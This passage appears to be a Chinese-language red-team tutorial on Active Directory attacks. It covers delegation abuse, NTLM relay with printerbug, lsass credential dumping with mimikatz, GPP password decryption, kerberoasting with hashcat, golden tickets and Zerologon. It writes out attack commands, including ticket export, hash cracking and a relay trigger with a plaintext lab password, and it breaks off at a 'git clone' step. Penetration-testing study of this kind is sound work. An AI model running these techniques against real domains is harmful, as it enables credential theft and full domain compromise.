\u4ece\u653b\u51fb\u89d2\u5ea6\u6765\u8bf4\uff1a\u5982\u679c\u653b\u51fb\u8005\u62ff\u5230\u4e86\u4e00\u53f0\u914d\u7f6e\u4e86\u975e\u7ea6\u675f\u59d4\u6d3e\u7684\u673a\u5668\u6743\u9650\uff0c\u53ef\u4ee5\u8bf1\u5bfc\u7ba1\u7406\u5458\u6765\u8bbf\u95ee\u8be5\u673a\u5668\uff0c\u7136\u540e\u53ef\u4ee5\u5f97\u5230\u7ba1\u7406\u5458\u7684TGT\uff0c\u4ece\u800c\u6a21\u62df\u7ba1\u7406\u5458\u8bbf\u95ee\u4efb\u610f\u670d\u52a1\uff0c\u76f8\u5f53\u4e8e\u62ff\u4e0b\u4e86\u6574\u4e2a\u57df\u73af\u5883<\/p>\n \u6ce8\u518c\u670d\u52a1\u7528\u6237 \u6ce8\u518c\u670d\u52a1\u8d26\u53f7\u540e \u5177\u6709\u59d4\u6d3e\u9009\u9879<\/p>\n setspn -A https\/web web<\/p>\n \u8bbe\u7f6e\u4e3b\u673a\u59d4\u6d3e<\/p>\n \u5f53\u670d\u52a1\u8d26\u53f7\u6216\u8005\u4e3b\u673a\u88ab\u8bbe\u7f6e\u4e3a\u975e\u7ea6\u675f\u6027\u59d4\u6d3e\u65f6\uff0c\u5176userAccountControl\u5c5e\u6027\u4f1a\u5305\u542b<\/p>\n TRUSTED_FOR_DELEGATION<\/p>\n \u5bfc\u5165\u6a21\u5757 PowerView.ps1<\/p>\n \u67e5\u8be2\u975e\u7ea6\u675f\u4e3b\u673a<\/p>\n Get-NetComputer -Unconstrained -Domain redteam.club<\/p>\n \u67e5\u8be2\u975e\u7ea6\u675f\u7528\u6237<\/p>\n \u57df\u7ba1\u7406\u4f7f\u7528winrm\u670d\u52a1\u5668\u8fdc\u7a0b\u8fde\u63a5\u57df\u5185\u4e3b\u673a<\/p>\n \u6b64\u65f6\u57df\u7ba1\u7684\u51ed\u8bc1\u5df2\u7f13\u5b58\u4e8e\u76ee\u6807\u673a\u5668\uff0c\u4f7f\u7528\u57df\u5185\u673a\u5668\u767b\u5f55\u672c\u5730\u7ba1\u7406\u5458\uff0c\u5bfc\u51fa\u76f8\u5173\u51ed\u8bc1<\/p>\n \u6b64\u65f6\u5148\u5c1d\u8bd5\u8fde\u63a5\u57df\u63a7\uff0c\u5747\u65e0\u6cd5\u8fde\u63a5<\/p>\n \u5bfc\u5165\u5148\u524d\u51ed\u8bc1\uff1a<\/p>\n \u5bfc\u5165\u7968\u636e \u8bbf\u95ee\u57df\u63a7 ad.redteam.club<\/p>\n \u9ed8\u8ba4\u60c5\u51b5\u4e0bSpooler\u670d\u52a1\u4e3a\u81ea\u52a8\u542f\u52a8<\/p>\n \u786e\u8ba4\u76ee\u6807\u4e3b\u673a\u5f00\u542f\u76f8\u5173\u6743\u9650<\/p>\n \u540e\u7eed\u7528Rubeus\u6765\u76d1\u542c\u4e8b\u4ef6id\u4e3a4624\u7684\u4e8b\u4ef6\uff0c\u53ef\u4ee5\u7b2c\u4e00\u4e8b\u4ef6\u622a\u53d6\u5230\u57df\u63a7\u7684TGT\uff0c\u76d1\u542c\u6765\u81ea\u57df\u63a7ad1\u7684\u767b\u5f55<\/p>\n \u8868\u793a\u5229\u7528\u6253\u5370\u670d\u52a1\u5f3a\u5236\u8ba9\u57df\u63a7\u673a\u541112server2\u4e3b\u673a\u9a8c\u8bc1\u8eab\u4efd\uff0c\u8fd9\u6837\u6211\u4eec\u7684Rubeus\u5c31\u53ef\u4ee5\u76d1\u542c\u5230TGS\u4e86<\/p>\n \u76d1\u542c\u7684tgt<\/p>\n \u63d0\u53d6tgs<\/p>\n \u7136\u540e\u76f4\u63a5\u7528 powershell \u8f6c\u5230\u4e3a\u6b63\u5e38\u7684 TGT \u5373\u53ef<\/p>\n \u8fd9\u6837\u6211\u4eec\u5c31\u53ef\u4ee5\u5f97\u5230 TGT \u7968\u636e\u4e86<\/p>\n \u6ce8\u5165\u7968\u636e \u5bfc\u51fahash<\/p>\n \u5bfc\u5165\u7968\u636e\u540eptt\u5373\u53ef<\/p>\n kerberos::ptt XXX.kirbi<\/p>\n \u5f53\u524d\u7684\u6743\u9650\u662f\u57df\u7684\u672c\u5730\u7ba1\u7406\u5458\uff0c\u4e0d\u662f\u57df\u63a7\u7684\u6743\u9650\uff0c\u6240\u4ee5\u8fd8\u662f\u8981\u5236\u4f5c\u9ec4\u91d1\u7968\u636e \u8bbf\u95ee\u57df\u63a7<\/p>\n \u83b7\u53d6\u57df\u63a7\u7684sid<\/p>\n whoami \/all<\/p>\n sid \u4e0d\u9700\u8981\u540e\u95e8\u7684\u4f4d\u6570<\/p>\n \u5236\u4f5c\u9ec4\u91d1\u7968\u636e\u8bed\u53e5<\/p>\n \u5236\u4f5c\u6210\u529f\u540e \u5bfc\u5165\u7968\u636e\u8bbf\u95ee\u57df\u63a7<\/p>\n \u7531\u4e8e\u975e\u7ea6\u675f\u59d4\u6d3e\u7684\u4e0d\u5b89\u5168\u6027\uff0c\u5fae\u8f6f\u5728windows server 2003\u4e2d\u5f15\u5165\u4e86\u7ea6\u675f\u59d4\u6d3e\uff0c\u5bf9Kerberos\u534f\u8bae\u8fdb\u884c\u4e86\u62d3\u5c55\uff0c\u5f15\u5165\u4e86S4U\uff0c\u5176\u4e2dS4U\u652f\u6301\u4e24\u4e2a\u5b50\u534f\u8bae\uff1aService for User to Self ( S4U2Self )\u548c Service for Userto Proxy ( S4U2proxy )\uff0c\u8fd9\u4e24\u4e2a\u6269\u5c55\u90fd\u5141\u8bb8\u670d\u52a1\u4ee3\u8868\u7528\u6237\u4eceKDC\u8bf7\u6c42\u7968\u8bc1\u3002 S4U2self\u53ef\u4ee5\u4ee3\u8868\u81ea\u8eab\u8bf7\u6c42\u9488\u5bf9\u5176\u81ea\u8eab\u7684\u53ef\u8f6c\u53d1\u7684Kerberos\u670d\u52a1\u7968\u636e(ST1) \uff1b S4U2proxy\u53ef\u4ee5\u4ee5\u7528\u6237\u7684\u540d\u4e49\u8bf7\u6c42\u5176\u5b83\u670d\u52a1\u7684ST2 \uff0c\u7ea6\u675f\u59d4\u6d3e\u5c31\u662f\u9650\u5236\u4e86S4U2proxy\u6269\u5c55\u7684\u8303\u56f4<\/p>\n S4U2Self \uff08\u7528\u7528\u6237\u7684TGT\u5411KDC\u8bf7\u6c42\u7528\u6237\u7684\u53ef\u8f6c\u53d1\u7684ST1\uff0c\u518d\u7528\u8fd9\u5f20ST1\u53bb\u53d1\u8d77S4U2proxy\u8bf7\u6c42\u3002\uff09\u901a\u8fc7\u6b64\u6269\u5c55\u53ef\u4ee5\u62ff\u5230\u4e00\u5f20\u6807\u8bc6\u4efb\u610f\u7528\u6237\u8eab\u4efd\u7684ST\uff0c\u5b83\u7684\u4f5c\u7528\u5176\u5b9e\u662f \u534f\u8bae\u8f6c\u6362 \u3002\u6709\u65f6\u7528\u6237\u4f1a\u901a\u8fc7 \u5176\u4ed6\u534f\u8bae\uff08\u4f8b\u5982NTLM\u6216\u4ec0\u81f3\u57fa\u4e8e\u8868\u5355\u7684\u8eab\u4efd\u9a8c\u8bc1\uff09\u5bf9\u670d\u52a1\u8fdb\u884c\u8eab\u4efd\u9a8c\u8bc1\uff0c\u56e0\u6b64\u4ed6\u4eec\u4e0d\u4f1a\u5c06TGS\u53d1\u9001\u7ed9\u670d\u52a1\u3002\u5728\u8fd9\u79cd\u60c5\u51b5\u4e0b\uff0c\u670d\u52a1\u53ef\u4ee5 \u8c03\u7528S4U2Self\u6765\u8981\u6c42\u8eab\u4efd\u9a8c\u8bc1\u670d\u52a1\u4e3a\u5176\u81ea\u8eab\u7684\u4efb\u610f\u7528\u6237\u751f\u6210TGS \uff0c\u7136\u540e\u53ef\u4ee5\u5728\u8c03\u7528S4U2Proxy\u65f6\u5c06\u5176\u7528\u4f5c\u4f9d\u636e\u3002\u4f8b\u5982\u7f51\u7ad9A\u670d\u52a1\u5668\u53ef\u4ee5\u4f7f\u7528\u5b83\u53bb\u5411KDC\u8bf7\u6c42\u4e00\u5f20\u7528\u6237B\u8eab\u4efd\u7684ST1\uff0c\u7f51\u7ad9A\u670d\u52a1\u5668\u518d\u7528\u8fd9\u5f20ST1\u53bb\u53d1\u8d77S4U2proxy\u8bf7\u6c42\u3002<\/p>\n S4U2proxy \uff08\u62ff\u7528\u6237\u7684\u53ef\u8f6c\u53d1\u7684ST1\u8bf7\u6c42\u7528\u4e8e\u8bbf\u95ee\u670d\u52a1\u5668\u7684ST2\uff09 \u8be5\u62d3\u5c55\u4f5c\u7528\u662f\u4f7f\u7528\u4e00\u5f20\u7528\u6237A\u8eab\u4efd\u7684ST1\u53bb\u5411KDC\u8bf7\u6c42\u4e00\u5f20\u7528\u4e8e\u8bbf\u95ee\u6587\u4ef6\u670d\u52a1\u5668B\u7684ST2\uff0c\u8fd9\u5f20ST2\u7684\u8eab\u4efd\u8fd8\u662f\u7528\u6237\u7684\uff0c\u8fd9\u6837\u7684\u8bdd\u7f51\u7ad9A\u5c31\u53ef\u4ee5\u5229\u7528\u7528\u6237A\u7684\u6743\u9650\u53bb\u8bbf\u95ee\u6587\u4ef6\u670d\u52a1\u5668B\u4e0a\u7684\u6587\u4ef6\u4e86\u3002<\/p>\n \u5927\u81f4\u6d41\u7a0b\uff1a<\/p>\n user\u8bbf\u95eeserviceA\uff0c\u5411DC\u53d1\u8d77kerberos\u8ba4\u8bc1\uff0c\u57df\u63a7\u8fd4\u56deuser\u7684TGT\u548cST1\u7968\u636e\uff0cuser\u4f7f\u7528ST1\u7968\u636e\u5bf9serviceA\u8fdb\u884c\u8bbf\u95ee<\/p>\n \u5982\u679c\u914d\u7f6e\u4e86serviceA\u5230serviceB\u7684\u7ea6\u675f\u59d4\u6d3e\uff0c\u5219serviceA\u80fd\u4f7f\u7528S4U2Proxy\u534f\u8bae\u5c06\u7528\u6237\u53d1\u7ed9\u81ea\u5df1\u7684\u53ef\u8f6c\u53d1\u7684ST1\u7968\u636e\u4ee5\u7528\u6237\u7684\u8eab\u4efd\u53d1\u7ed9DC\u3002<\/p>\n \u57df\u63a7\u8fd4\u56deserviceA\u4e00\u4e2a\u7528\u6765\u8bbf\u95eeserviceB\u7684ST2\u7968\u636e,\u8fd9\u6837serviceA\u5c31\u80fd\u4ee5\u7528\u6237\u7684\u8eab\u4efd\u5bf9serviceB\u53d1\u8d77\u8bbf\u95ee\u3002<\/p>\n \u7531\u4e8e\u670d\u52a1\u7528\u6237 \u53ea\u80fd\u83b7\u53d6\u67d0\u4e2a\u7528\u6237\uff08\u6216\u4e3b\u673a\uff09\u7684\u670d\u52a1\u7684ST1\u800c\u975eTGT \uff0c \u6240\u4ee5\u53ea\u80fd\u6a21\u62df\u7528\u6237\u8bbf\u95ee\u7279\u5b9a\u7684\u670d\u52a1 \uff0c\u4f46\u662f\u5982\u679c\u80fd\u62ff\u5230\u7ea6\u675f\u59d4\u6d3e\u7528\u6237\uff08\u6216\u4e3b\u673a\uff09\u7684\u5bc6\u7801\u6216\u8005Hash\uff0c\u5c31\u53ef\u4ee5 \u4f2a\u9020S4U\u7684\u8bf7\u6c42\uff0c\u4f2a\u88c5\u6210\u670d\u52a1\u7528\u6237\u4ee5\u4efb\u610f\u7528\u6237\u7684\u6743\u9650\u7533\u8bf7\u8bbf\u95ee\u6307\u5b9a\u670d\u52a1\u7684ST2 <\/p>\n \u6b64\u5904\u5982\u679c\u6ca1\u6709\u7528\u6237\uff0c\u9700\u8981\u65b0\u5efa\u4e2a\u7528\u6237\uff0c\u52a0\u4e0aspn\u6807\u8bc6\u4e3a\u670d\u52a1\u7528\u6237<\/p>\n setspn -A cifs\/12server3.redteam.club websec<\/p>\n \u8bbe\u7f6e\u670d\u52a1\u7528\u6237\u5bf9websec\u7684cifs\u670d\u52a1\u7684\u59d4\u6d3e<\/p>\n \u8bbe\u7f6e\u7ea6\u675f\u7528\u6237\u5b58\u5728 TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION \u5173\u952e\u5b57<\/p>\n \u4f7f\u7528\u547d\u4ee4\u67e5\u8be2\u7ea6\u675f\u7528\u6237<\/p>\n \u8fd9\u65f6\u5019kekeo\u5f53\u524d\u8def\u5f84\u4e0b\u4f1a\u51fa\u73b0administrator\u7684ticket (\u7528\u4e8e\u8bbf\u95eewebsec\u7684CIFS\u670d\u52a1),\u5bfc\u5165\u8fd9\u4e2atiket\u5373\u53ef<\/p>\n \u8bbf\u95eewebsec\u7684cifs\u670d\u52a1:<\/p>\n \u4f7f\u7528kekeo\u5bfc\u5165\u7968\u636e\u8bbf\u95ee\u57df\u63a7<\/p>\n \u7ea6\u675f\u59d4\u6d3e\u4e00\u822c\u7528\u6237\u6743\u9650\u7ef4\u6301\u8f83\u591a<\/p>\n :::color1 \u65e0\u9700\u57df\u7ba1\u8bbe\u7f6e\u76f8\u5173\u5c5e\u6027\uff0c\u8bf7\u6c42ST\u7684\u8fc7\u7a0b\u4e0e\u5148\u524d\u7684\u7ea6\u675f\u59d4\u6d3e\u7c7b\u4f3c\uff0c\u4f20\u7edf\u7684\u7ea6\u675f\u59d4\u6d3eS4U2Self\u8fd4\u56de\u7684\u7968\u636e\u4e00\u5b9a\u662f\u53ef\u8f6c\u53d1\u7684\uff0c\u5982\u679c\u4e0d\u53ef\u8f6c\u53d1\u90a3\u4e48S4U2Proxy\u5c06\u5931\u8d25\uff1b\u4f46\u662f\u57fa\u4e8e\u8d44\u6e90\u7684\u7ea6\u675f\u59d4\u6d3e\u4e0d\u540c\uff0c\u5c31\u7b97S4U2Self\u8fd4\u56de\u7684\u7968\u636e\u4e0d\u53ef\u8f6c\u53d1\uff08\u53ef\u4e0d\u53ef\u4ee5\u8f6c\u53d1\u7531TrustedToAuthenticationForDelegation\u51b3\u5b9a\uff09\uff0cS4U2Proxy\u4e5f\u662f\u53ef\u4ee5\u6210\u529f\uff0c\u5e76\u4e14S4U2Proxy\u8fd4\u56de\u7684\u7968\u636e\u603b\u662f\u53ef\u8f6c\u53d1<\/p>\n \u603b\u4e4b\u9700\u8981\u7528\u6237\u5bf9\u4e3b\u673a\u7684\u5c5e\u6027\u5177\u5907\u5199\u6743\u9650<\/p>\n :::<\/p>\n \u57fa\u4e8e\u8d44\u6e90\u7684\u7ea6\u675f\u59d4\u6d3e(RBCD)\u662f\u5728Windows Server 2012\u4e2d\u65b0\u52a0\u5165\u7684\u529f\u80fd\uff0c\u4e0e\u4f20\u7edf\u7684\u7ea6\u675f\u59d4\u6d3e\u76f8\u6bd4\uff0c\u5b83\u4e0d\u518d\u9700\u8981\u57df\u7ba1\u7406\u5458\u6743\u9650\u53bb\u8bbe\u7f6e\u76f8\u5173\u5c5e\u6027\u3002RBCD\u628a\u8bbe\u7f6e\u59d4\u6d3e\u7684\u6743\u9650\u8d4b\u4e88\u4e86\u673a\u5668\u81ea\u8eab\uff0c\u65e2\u673a\u5668\u81ea\u5df1\u53ef\u4ee5\u51b3\u5b9a\u8c01\u53ef\u4ee5\u88ab\u59d4\u6d3e\u6765\u63a7\u5236\u6211\u3002\u4e5f\u5c31\u662f\u8bf4\u673a\u5668\u81ea\u8eab\u53ef\u4ee5\u76f4\u63a5\u5728\u81ea\u5df1\u8d26\u6237\u4e0a\u914d\u7f6emsDS-AllowedToActOnBehalfOfOtherIdentity\u5c5e\u6027\u6765\u8bbe\u7f6eRBCD\u3002<\/p>\n \u8fd9\u91cc\u7684\u5173\u952e\u5c31\u662f\u8c01\u53ef\u4ee5\u4fee\u6539\u5c5e\u6027<\/p>\n \u521b\u5efa\u673a\u5668\u4e3b\u673a\u8d26\u53f7<\/p>\n \u4e2d\u7ee7&\u59d4\u6d3e<\/p>\n \u6267\u884cntlmrelayx.py\u811a\u672c\u8fdb\u884cNTLM\u4e2d\u7ee7\u653b\u51fb\uff0c\u8bbe\u7f6eSMB\u670d\u52a1\u5668\u5e76\u5c06\u8ba4\u8bc1\u51ed\u636e\u4e2d\u7ee7\u5230LDAP\u534f\u8bae\u3002\u5176\u4e2d\u2013<\/p>\n remove-mic\u9009\u9879\u7528\u4e8e\u6e05\u9664MIC\u6807\u5fd7\uff0c\u2013escalate-user\u7528\u4e8e\u63d0\u5347\u6307\u5b9a\u7528\u6237\u6743\u9650<\/p>\n \u57df\u63a7\u6709\u4e24\u53f0\u57df\u63a7 10.10.10.142 \u4e3b\u63a7 10.10.10.140\u662f\u5907\u4efd\u57df\u63a7 10.10.10.139 \u662f\u4e2d\u7ee7\u673a\u5b50\uff08kali\uff09<\/p>\n \u76d1\u542c\u63d0\u5347 \u4fee\u6539\u59d4\u6d3e<\/p>\n \u83b7\u53d6\u670d\u52a1\u7968\u636e<\/p>\n \u5bfc\u51fa\u57df\u63a7\u54c8\u5e0c<\/p>\n \u9996\u5148\u67e5\u8be2\u57df\u666e\u901a\u7528\u6237\u52a0\u5165\u57df\u7684\u673a\u5b50<\/p>\n \u67e5\u8be2\u5230\u52a0\u5165\u57df\u4e3b\u673a\u7684 \u57df\u7528\u6237<\/p>\n \u4f7f\u7528SharpAllowedToAct\u4fee\u6539\u59d4\u6d3e \u5de5\u5177\u4e0b\u8f7d https:\/\/github.com\/HPVCA\/SharpAllowedToAct<\/a><\/p>\n \u83b7\u53d6\u670d\u52a1\u7968\u636e<\/p>\n \u83b7\u53d6\u57df\u666e\u901a\u4e3b\u673a\u6743\u9650<\/p>\n \u5728\u57df\u6e17\u900f\u4e2d\u3001\u4f5c\u4e3a\u6e17\u900f\u6d4b\u8bd5\u4eba\u5458\uff0c\u83b7\u53d6\u57df\u63a7\u7684\u6743\u9650\u57fa\u672c\u4e0a\u53ef\u4ee5\u83b7\u53d6\u6574\u4e2a\u5185\u7f51\u7684\u6743\u9650<\/p>\n \u5f53\u57df\u7ba1\u7406\u5458\u5728\u57df\u6210\u5458\u673a\u5668\u4e0a\u767b\u5f55\u8fdb\u884c\u5de5\u4f5c\u7684\u65f6\u5019\uff0c\u4f1a\u5c06\u660e\u6587\u5bc6\u7801\u4fdd\u5b58\u5728\u672c\u5730\u8fdb\u884c\u7684lsass.exe\uff0c\u53ef\u4ee5\u901a\u8fc7mimikatz\u6765\u8bfb\u53d6\u5230\u672c\u5730\u7684\u660e\u6587\u5bc6\u7801<\/p>\n \u5982\u679c\u4e3b\u673a\u5b58\u5728\u6740\u8f6f\u7684\u65f6\u5019\uff0c\u4e0a\u4f20mimikatz\u5f88\u591a\u65f6\u5019\u90fd\u4f1a\u88ab\u6740\u6389\uff0c\u53ef\u4ee5\u901a\u8fc7procdump+mimikatz\u7684\u65b9\u5f0f\u8fdb\u884c\u7ed5\u8fc7\u3002\u5148\u5bfc\u51falsass.exe<\/p>\n \u4fdd\u5b58\u5230\u672c\u5730\uff0c\u901a\u8fc7mimikatz\u8bfblsass.dmp\u7684\u660e\u6587<\/p>\n \u5982\u679c\u76ee\u6807\u673a\u5668\u662fwindows server 2012\uff0c\u901a\u8fc7\u6dfb\u52a0\u6ce8\u518c\u8868\uff0c\u5728\u901a\u8fc7\u9501\u5c4f\uff0c\u8ba9\u7ba1\u7406\u5458\u91cd\u65b0\u767b\u5f55\u53ca\u53ef\u4ee5\u8bfb\u53d6\u660e\u6587\u3002<\/p>\n \u6dfb\u52a0\u6ce8\u518c\u8868\uff0c\u8bbe\u7f6eUseLogonCredential\u8bbe\u7f6e\u4e3a1<\/p>\n \u5229\u7528powershell\u811a\u672c\u8fdb\u884c\u9501\u5c4f<\/p>\n \u7ba1\u7406\u5458\u91cd\u65b0\u767b\u5f55\u540e\u5c31\u53ef\u4ee5\u6293\u53d6\u5230\u660e\u6587\u5bc6\u7801\u4e86<\/p>\n \u5728\u57df\u73af\u5883\u4e2d\uff0c\u6709\u4e2a\u9ed8\u8ba4\u7684\u5171\u4eab\u8def\u5f84<\/p>\n SYSVOL\u662f\u6d3b\u52a8\u76ee\u5f55\u5b58\u50a8\u6587\u4ef6\u670d\u52a1\u526f\u672c\u7684\u5171\u4eab\u6587\u4ef6\u5939\uff0c\u91cc\u9762\u5305\u542b\u6709\u767b\u5f55\u811a\u672c\uff0c\u7ec4\u7b56\u7565\u6570\u636e\u7b49\uff0c\u57df\u91cc\u7684\u6240\u6709\u7528\u6237\u90fd\u80fd\u8bbf\u95ee\u8fd9\u4e2a\u5171\u4eab\u6587\u4ef6\u3002\u5728SYSVOL\u76ee\u5f55\u4e0b\uff0c\u9ed8\u8ba4\u662f\u6ca1\u6709groups.xml\u6587\u4ef6\u7684\uff0c\u5fc5\u987b\u521b\u5efa\u7ec4\u7b56\u7565\u811a\u672c\u767b\u5f55\u624d\u6709\u8fd9\u4e2a\u6587\u4ef6\u3002\u5728groups.xml\u6587\u4ef6\u4e2d\uff0c\u5bc6\u7801\u662f\u901a\u8fc7AES-256\u52a0\u5bc6\u7684\uff0c\u4f46\u662f\u5fae\u8f6f\u53d1\u5e03\u4e86AES\u7684\u79c1\u94a5<\/p>\n \u53ef\u4ee5\u5229\u7528powershell\u89e3\u5bc6\u5bc6\u6587<\/p>\n \u9488\u5bf9SYSOVL\u7684\u9632\u5fa1<\/p>\n 1.\u6253\u8865\u4e01KB2962486<\/p>\n 2.\u5220\u9664SYSVOL\u76ee\u5f55\u4e0b\u7684groups.xml<\/p>\n 3.\u8bbe\u7f6e\u5171\u4eab\u6587\u4ef6SYSVOL\u7684\u6743\u9650<\/p>\n SPN\u4e3a\u670d\u52a1\u4e3b\u4f53\u540d\u79f0\uff0c\u662f\u670d\u52a1\u5b9e\u5217(MSSQL,HTTP\u7b49)\u7684\u552f\u4e00\u6807\u8bc6\uff0c\u5982\u679c\u5728\u6797\u4e2d\u5b89\u88c5\u670d\u52a1\u7684\u591a\u4e2a\u5b9e\u5217\uff0c\u6bcf\u4e2a\u5b9e\u5217\u90fd\u6709\u81ea\u5df1\u7684SPN\uff0c\u5982\u679ckerberos\u670d\u52a1\u7968\u8bc1\u7684\u52a0\u5bc6\u7c7b\u578b\u4e3aRC4_HMAC_MD5\uff0c\u5c31\u53ef\u4ee5\u5bfc\u51faTGS\u5bf9\u5176\u8fdb\u884c\u79bb\u7ebf\u7834\u89e3\uff0c\u6709\u53ef\u80fd\u83b7\u53d6\u5230\u57df\u7528\u6237\u7684\u5bc6\u7801\u4e86\u3002<\/p>\n \u539f\u7406<\/p>\n \u5f53\u57df\u5185\u67d0\u4e2a\u7528\u6237\u53bb\u8bf7\u6c42\u540c\u57df\u5185\u7684\u67d0\u4e2a\u670d\u52a1\u8d44\u6e90\u65f6,\u8bf7\u6c42\u4f1a\u9996\u5148\u88ab\u9001\u8fbe KDS \u7684 AS \u4e2d\u8fdb\u884c\u8eab\u4efd\u8ba4\u8bc1,\u8ba4\u8bc1\u901a\u8fc7\u540e AS \u4f1a\u8fd4\u56de\u4e00\u4e2a\u7528\u7528\u6237\u5bc6\u7801 hash \u52a0\u5bc6\u7684 TGT \u7ed9\u7528\u6237,\u7136\u540e\u7528\u6237\u518d\u62ff\u7740 \u8fd9\u4e2a TGT \u5411 TGS \u53bb\u8bf7\u6c42,TGS\u4f1a\u8fd4\u56de\u4e00\u4e2a\u7528\u5bf9\u5e94\u670d\u52a1\u8d26\u53f7\u7684\u5bc6\u7801 hash\u52a0\u5bc6\u8fc7(RC4_HMAC_MD5)\u7684\u4e13\u95e8\u7528\u4e8e\u8bbf\u95ee\u7279\u5b9a\u670d\u52a1\u7684\u670d\u52a1\u7968\u636e\u56de\u6765,\u6700\u540e,\u7528\u6237\u53ea\u9700\u62ff\u8fd9\u5f20\u670d\u52a1\u7968\u636e\u53bb\u8bbf\u95ee\u5bf9\u5e94\u7684\u670d\u52a1\u8d44\u6e90\u5373\u53ef,\u800c\u95ee\u9898\u5c31\u51fa\u5728 TGS \u8fd4\u56de\u670d\u52a1\u7968\u636e,\u76ee\u6807\u670d\u52a1\u6b64\u65f6\u7528\u7684\u4e00\u4e2a\u57df\u8d26\u53f7\u6765\u8fd0\u884c\u7684,\u90a3\u4e48 TGS \u5728\u5411\u7528\u6237\u8fd4\u56de\u670d\u52a1\u7968\u636e\u65f6,\u7528\u6237\u5c31\u53ef\u4ee5\u62ff\u5230\u8fd9\u5f20\u670d\u52a1\u7968\u636e\u4e2dhash,\u7531\u4e8e TGS \u670d\u52a1\u7968\u636e\u52a0\u5bc6\u7b97\u6cd5\u5df2\u77e5,\u5c1d\u8bd5\u7a77\u4e3e\u53e3\u4ee4\uff0c\u6a21\u62df\u52a0\u5bc6\u8fc7\u7a0b\uff0c\u751f\u6210TGS\u8fdb\u884c\u6bd4\u8f83\u3002\u5982\u679cTGS\u76f8\u540c\uff0c\u4ee3\u8868\u53e3\u4ee4\u6b63\u786e\uff0c\u5c31\u80fd\u83b7\u5f97\u76ee\u6807\u670d\u52a1\u5b9e\u4f8b\u7684\u660e\u6587\u53e3\u4ee4\u4f7f\u7528setspn\u67e5\u8be2spn(windows7\u548cserver2008\u9ed8\u8ba4\u81ea\u5e26)<\/p>\n \u67e5\u8be2\u57df\u5185\u6240\u6709\u7684SPN\u548c\u67e5\u8be2test\u57df\u7684SPN<\/p>\n \u4ee5CN\u5f00\u5934\u7684\u4e3a\u4ee3\u8868\u4e00\u4e2a\u8d26\u53f7\uff0c\u673a\u5668\u8d26\u53f7\u4e3aComputers\uff0c\u57df\u7528\u6237\u8d26\u53f7\u4e3aUsers<\/p>\n \u67e5\u8be2\u57df\u5185\u6ce8\u518c\u7684spn\uff08kerberoast\uff09<\/p>\n PowerView<\/p>\n https:\/\/github.com\/PowerShellMafia\/PowerSploit\/blob\/dev\/Recon\/PowerView.ps1<\/a><\/p>\n \u7ed9mySQL\u670d\u52a1\u6ce8\u518cSPN<\/p>\n \u5c06kerberos\u7684\u52a0\u5bc6\u65b9\u5f0f\u6362\u6210RC4_HMAC_MD5<\/p>\n \u8bf7\u6c42\u6307\u5b9a\u7684TGS\uff0c\u5b8c\u6210\u4e4b\u540eklist\u5c31\u80fd\u67e5\u770b\u76f8\u5e94\u7684\u7968\u636e<\/p>\n mimikatz\u5bfc\u51fa\u7968\u636e<\/p>\n kerberos::list \/export<\/p>\n \u4f7f\u7528tgsrepcrack.py\u7834\u89e3<\/p>\n \u5982\u679c\u662f\u57df\u63a7\u7528\u6237\u6ce8\u518c\u7684 \u53ef\u4ee5\u5f97\u5230\u57df\u5f97\u660e\u6587\u5bc6\u7801<\/p>\n \u4f7f\u7528 System.IdentityModel.Tokens.KerberosRequestorSecurityToken \u8bf7\u6c42TGS\uff0c\u5728\u8fd4\u56de\u7ed3\u679c\u4e2d<\/p>\n \u63d0\u53d6\u51faTGS\uff0c\u8f93\u51fa\u7684TGS\u53ef\u9009\u62e9John the Ripper\u6216Hashcat\u8fdb\u884c\u7834\u89e3\u3002<\/p>\n \u5b9e\u4f8b\u6f14\u793a\uff1a<\/p>\n \u5728\u57df\u5185\u4e00\u53f0\u4e3b\u673a\u4e0a\u4ee5\u666e\u901a\u7528\u6237\u6743\u9650\u6267\u884c<\/p>\n \u8f93\u51fa\u7ed3\u679c\u5982\u4e0b\u56fe<\/p>\n \u4fdd\u5b58\u6587\u4ef6 \u4f7f\u7528hashcat\u5bf9\u5176\u7a77\u4e3e<\/p>\n hashcat -m 13100 hash \/home\/kali\/Desktop\/kerberoast-master\/passwd.txt -o found.txt –force<\/p>\n \u5bc6\u7801 pass@123<\/p>\n \u521b\u5efa\u673a\u5668\u4e3b\u673a\u8d26\u53f7<\/p>\n \u4e2d\u7ee7&\u59d4\u6d3e<\/p>\n \u6267\u884cntlmrelayx.py\u811a\u672c\u8fdb\u884cNTLM\u4e2d\u7ee7\u653b\u51fb\uff0c\u8bbe\u7f6eSMB\u670d\u52a1\u5668\u5e76\u5c06\u8ba4\u8bc1\u51ed\u636e\u4e2d\u7ee7\u5230LDAP\u534f\u8bae\u3002\u5176\u4e2d\u2013remove-mic\u9009\u9879\u7528\u4e8e\u6e05\u9664MIC\u6807\u5fd7\uff0c\u2013escalate-user\u7528\u4e8e\u63d0\u5347\u6307\u5b9a\u7528\u6237\u6743\u9650<\/p>\n \u57df\u63a7\u6709\u4e24\u53f0\u57df\u63a7 10.10.10.142 \u4e3b\u63a7 10.10.10.140\u662f\u5907\u4efd\u57df\u63a7 10.10.10.139 \u662f\u4e2d\u7ee7\u673a\u5b50\uff08kali\uff09<\/p>\n python3 printerbug.py redteam.club\/hack:pass@123@10.10.10.140 10.10.10.139<\/p>\n \u76d1\u542c\u63d0\u5347 \u4fee\u6539\u59d4\u6d3e<\/p>\n \u83b7\u53d6\u670d\u52a1\u7968\u636e<\/p>\n \u5bfc\u51fa\u57df\u63a7\u54c8\u5e0c<\/p>\n \u7b80\u4ecb<\/p>\n Netlogon\u4f7f\u7528\u7684AES\u8ba4\u8bc1\u7b97\u6cd5\u4e2d\u7684vi\u5411\u91cf\u9ed8\u8ba4\u4e3a0\uff0c\u5bfc\u81f4\u653b\u51fb\u8005\u53ef\u4ee5\u7ed5\u8fc7\u8ba4\u8bc1\uff0c\u540c\u65f6\u5176\u8bbe\u7f6e\u57df\u63a7\u5bc6\u7801\u7684\u8fdc\u7a0b\u63a5\u53e3\u4e5f\u4f7f\u7528\u4e86\u8be5\u51fd\u6570\uff0c\u5bfc\u81f4\u53ef\u4ee5\u5c06\u57df\u63a7\u4e2d\u4fdd\u5b58\u5728AD\u4e2d\u7684\u7ba1\u7406\u5458password\u8bbe\u7f6e\u4e3a\u7a7a<\/p>\n \u5f71\u54cd\u7248\u672c<\/p>\n \u4f7f\u7528zerologin\u811a\u672c\u590d\u73b0<\/p>\n python3 zerologon_tester.py ad01 10.10.10.1<\/p>\n \u6f0f\u6d1e\u5229\u7528<\/p>\n \u4e0b\u8f7dexp\uff1a git clone 